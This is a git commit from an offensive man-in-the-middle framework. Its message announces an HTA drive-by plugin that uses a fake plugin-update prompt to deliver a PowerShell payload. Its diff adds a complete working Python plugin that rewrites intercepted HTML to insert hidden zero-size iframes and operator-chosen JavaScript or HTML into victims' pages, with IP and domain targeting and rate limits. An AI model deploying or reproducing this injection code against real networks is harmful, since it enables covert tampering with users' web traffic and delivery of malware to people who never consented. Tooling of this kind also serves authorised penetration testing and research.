This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
2025-07-06 04:52:22 -07:00 · 2015-07-18 20:14:07 +02:00 · 2015-07-18 20:14:07 +02:00 · 5e2f30fb89
commit 5e2f30fb89
parent ff0ada2a39
64 changed files with 3748 additions and 1473 deletions
--- a/plugins/inject.py
+++ b/plugins/inject.py
@ -0,0 +1,167 @@
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import time
+import sys
+
+from bs4 import BeautifulSoup
+from plugins.plugin import Plugin
+
+class Inject(Plugin):
+    name       = "Inject"
+    optname    = "inject"
+    desc       = "Inject arbitrary content into HTML content"
+    version    = "0.4"
+
+    def initialize(self, options):
+        '''Called if plugin is enabled, passed the options namespace'''
+        self.options       = options
+        self.ip            = options.ip
+
+        self.html_url      = options.html_url
+        self.html_payload  = options.html_payload
+        self.html_file     = options.html_file
+        self.js_url        = options.js_url
+        self.js_payload    = options.js_payload
+        self.js_file       = options.js_file
+
+        self.rate_limit    = options.rate_limit
+        self.count_limit   = options.count_limit
+        self.per_domain    = options.per_domain
+        self.black_ips     = options.black_ips.split(',')
+        self.white_ips     = options.white_ips.split(',')
+        self.white_domains = options.white_domains.split(',')
+        self.black_domains = options.black_domains.split(',')
+        
+        self.ctable        = {}
+        self.dtable        = {}
+        self.count         = 0
+
+    def response(self, response, request, data):
+
+        ip = response.getClientIP()
+        hn = response.getRequestHostname()
+        mime = response.headers['Content-Type']
+
+        if self._should_inject(ip, hn) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.ip) and ("text/html" in mime):
+            html = BeautifulSoup(data, "lxml")
+            if html.body:
+
+                if self.html_url:
+                    iframe = html.new_tag("iframe", src=self.html_url, frameborder=0, height=0, width=0)
+                    html.body.append(iframe)
+                    self.clientlog.info("Injected HTML Iframe: {}".format(hn))
+
+                if self.html_payload:
+                    payload = BeautifulSoup(self.html_payload, "html.parser")
+                    html.body.append(payload)
+                    self.clientlog.info("Injected HTML payload: {}".format(hn), extra=request.clientInfo)
+
+                if self.html_file:
+                    with open(self.html_file, 'r') as file:
+                        payload = BeautifulSoup(file.read(), "html.parser")
+                        html.body.append(payload)
+                    self.clientlog.info("Injected HTML file: {}".format(hn), extra=request.clientInfo)
+
+                if self.js_url:
+                    script = html.new_tag('script', type='text/javascript', src=self.js_url)
+                    html.body.append(script)
+                    self.clientlog.info("Injected JS script: {}".format(hn), extra=request.clientInfo)
+
+                if self.js_payload:
+                    tag = html.new_tag('script', type='text/javascript')
+                    tag.append(self.js_payload)
+                    html.body.append(tag)
+                    self.clientlog.info("Injected JS payload: {}".format(hn), extra=request.clientInfo)
+
+                if self.js_file:
+                    tag = html.new_tag('script', type='text/javascript')
+                    with open(self.js_file, 'r') as file:
+                        tag.append(file.read())
+                        html.body.append(tag)
+                    self.clientlog.info("Injected JS file: {}".format(hn), extra=request.clientInfo)
+
+                data = str(html)
+
+        return {'response': response, 'request':request, 'data': data}
+
+    def _ip_filter(self, ip):
+
+        if self.white_ips[0] != '':
+            if ip in self.white_ips:
+                return True
+            else:
+                return False
+
+        if self.black_ips[0] != '':
+            if ip in self.black_ips:
+                return False
+            else:
+                return True
+
+        return True
+
+    def _host_filter(self, host):
+
+        if self.white_domains[0] != '':
+            if host in self.white_domains:
+                return True
+            else:
+                return False
+
+        if self.black_domains[0] != '':
+            if host in self.black_domains:
+                return False
+            else:
+                return True
+
+        return True
+
+    def _should_inject(self, ip, hn):
+
+        if self.count_limit == self.rate_limit is None and not self.per_domain:
+            return True
+
+        if self.count_limit is not None and self.count > self.count_limit:
+            return False
+
+        if self.rate_limit is not None:
+            if ip in self.ctable and time.time()-self.ctable[ip] < self.rate_limit:
+                return False
+
+        if self.per_domain:
+            return not ip+hn in self.dtable
+
+        return True
+
+    def options(self, options):
+        options.add_argument("--js-url", type=str, help="URL of the JS to inject")
+        options.add_argument('--js-payload', type=str, help='JS string to inject')
+        options.add_argument('--js-file', type=str, help='File containing JS to inject')
+        options.add_argument("--html-url", type=str, help="URL of the HTML to inject")
+        options.add_argument("--html-payload", type=str, help="HTML string to inject")
+        options.add_argument('--html-file', type=str, help='File containing HTML to inject')
+
+        group = options.add_mutually_exclusive_group(required=False)
+        group.add_argument("--per-domain", action="store_true", help="Inject once per domain per client.")
+        group.add_argument("--rate-limit", type=float, help="Inject once every RATE_LIMIT seconds per client.")
+        group.add_argument("--count-limit", type=int, help="Inject only COUNT_LIMIT times per client.")
+        group.add_argument("--white-ips", metavar='IP', default='', type=str, help="Inject content ONLY for these ips (comma seperated)")
+        group.add_argument("--black-ips", metavar='IP', default='', type=str, help="DO NOT inject content for these ips (comma seperated)")
+        group.add_argument("--white-domains", metavar='DOMAINS', default='', type=str, help="Inject content ONLY for these domains (comma seperated)")
+        group.add_argument("--black-domains", metavar='DOMAINS', default='', type=str, help="DO NOT inject content for these domains (comma seperated)")